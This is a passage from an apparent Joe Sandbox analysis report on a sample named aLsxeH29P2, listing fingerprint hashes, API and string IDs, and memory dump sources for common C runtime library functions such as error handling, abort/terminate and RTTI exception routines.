                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastWrite
                                                                                      • String ID: U
                                                                                      • API String ID: 442123175-4171548499
                                                                                      • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                      • Instruction ID: f4e0e9902a76f38140237504885feb8d14ae327b78fb0be1741b61b015dfc653
                                                                                      • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                      • Instruction Fuzzy Hash: CD41C572B18A4181DBA0AFA5E4443B9BBA0FB88BC4F804131EE5D9B798DF3CD441C790
                                                                                      Function 00007FFE126CA524 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+
                                                                                      • String ID: void$void
                                                                                      • API String ID: 2943138195-3746155364
                                                                                      • Opcode ID: d81aed41cb4c8c5c69bd061dfd49733f36ea67ee8bb27e73bf8cb873ba0293ca
                                                                                      • Instruction ID: 32f1b8d8b62637281351eaa9ba08d221c1a4022e68fedc1374a0385c1eb4996c
                                                                                      • Opcode Fuzzy Hash: d81aed41cb4c8c5c69bd061dfd49733f36ea67ee8bb27e73bf8cb873ba0293ca
                                                                                      • Instruction Fuzzy Hash: A0314762E18A598DFB01AFA6EC400FC37B0BB48758B944176DA8E52BA8DF7C9554C700
                                                                                      Function 00007FF7F3DEF5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectory
                                                                                      • String ID: :
                                                                                      • API String ID: 1611563598-336475711
                                                                                      • Opcode ID: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                      • Instruction ID: b37029886734000a9d914611960cd5f5a2887ad9afd9775e9a0d01581942454c
                                                                                      • Opcode Fuzzy Hash: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                      • Instruction Fuzzy Hash: 20212D72A0868143FB64AB51D04427DB7B5FB84B44FC64139D6AD5B2C4CF7CD58487E2
                                                                                      Function 00007FFE126C676F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileHeader$ExceptionRaise
                                                                                      • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                                                      • API String ID: 3685223789-3176238549
                                                                                      • Opcode ID: 161e8b28e34caca24568961a6528755d3751e4ffa6d3c1bec0c9a5cac7a2823b
                                                                                      • Instruction ID: bc35bd008f84f09b104c925d487cb6facf9a6971b89ed0d9413dd0ceb666179d
                                                                                      • Opcode Fuzzy Hash: 161e8b28e34caca24568961a6528755d3751e4ffa6d3c1bec0c9a5cac7a2823b
                                                                                      • Instruction Fuzzy Hash: 62015261A19D4AA6EE40EB16EC501786350EFC0764FC45471E64E066F9DFECF928C714
                                                                                      Function 00007FF7F3DDFD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                      • String ID: csm
                                                                                      • API String ID: 2573137834-1018135373
                                                                                      • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                      • Instruction ID: 51a07d2670193f30fdf77a6b3df9b0849c16a08b4fc514a6daec13f5d6cca019
                                                                                      • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                      • Instruction Fuzzy Hash: 2E116032609B8182EB619F25F440259B7E4FB88B98F584230DF9D1B798DF3CD551CB40
                                                                                      Function 00007FFE126C6B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                      • String ID: csm
                                                                                      • API String ID: 2573137834-1018135373
                                                                                      • Opcode ID: 96783e5d5ee86e7ed91570add2de904558e3ade983638e121ecc73efc59d9239
                                                                                      • Instruction ID: 11546cc5c32cfb8cfa9decaf99b842c036576eac0bab099c19e98b8bacc7f026
                                                                                      • Opcode Fuzzy Hash: 96783e5d5ee86e7ed91570add2de904558e3ade983638e121ecc73efc59d9239
                                                                                      • Instruction Fuzzy Hash: 4A112E32618F8582EB618F16E840269B7E5FB88B94F584270DECC077A8DF7DD9618B04
                                                                                      Function 00007FF7F3DF073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: DriveType_invalid_parameter_noinfo
                                                                                      • String ID: :
                                                                                      • API String ID: 2595371189-336475711
                                                                                      • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                      • Instruction ID: 015f66b4f2a5ee5cba2f5e32fa5b8454245007a3e5960606f7366a6863bcd1fe
                                                                                      • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                      • Instruction Fuzzy Hash: 0501F76191C20381F7A4BFB0A4A127EA7A0EF44744FC00135D57D6B2C9DF3CD5448BA4
                                                                                      Function 00007FFE126CF420 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FFE126C6E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE126C29EE), ref: 00007FFE126C6E56
                                                                                      • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE126CF45A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: abortterminate
                                                                                      • String ID: csm$f
                                                                                      • API String ID: 661698970-629598281
                                                                                      • Opcode ID: f31257b661c57643b6b4b1793288747ab2a9155158c122d579431834bbccefac
                                                                                      • Instruction ID: b46a0da6668792caa567a10060c1cdd912f2dd35fc960811adbe1057235029dc
                                                                                      • Opcode Fuzzy Hash: f31257b661c57643b6b4b1793288747ab2a9155158c122d579431834bbccefac
                                                                                      • Instruction Fuzzy Hash: D3E06C71D0CF5682D7107B63B94013D2654BF49B74F558076D748066E7CEBCD8B04745
                                                                                      Function 00007FFE126C6E64 Relevance: 5.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,?,00007FFE126C6CE9,?,?,?,?,00007FFE126D0582,?,?,?,?,?), ref: 00007FFE126C6E83
                                                                                      • SetLastError.KERNEL32(?,?,?,00007FFE126C6CE9,?,?,?,?,00007FFE126D0582,?,?,?,?,?), ref: 00007FFE126C6F0C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1452528299-0
                                                                                      • Opcode ID: 29fbcb28d85caf8942357daff49778de6b87ab13b42ab574bfe6367f35ca65f9
                                                                                      • Instruction ID: c7a4d15dd4fb71a594913c0afc08b80e675ce82eb1b75f42b58be74f510d0ebb
                                                                                      • Opcode Fuzzy Hash: 29fbcb28d85caf8942357daff49778de6b87ab13b42ab574bfe6367f35ca65f9
                                                                                      • Instruction Fuzzy Hash: D7118B60E0DE8B87FA15AB27AC541342251AF887B0F8486B5D97E077F5DE7CF8528704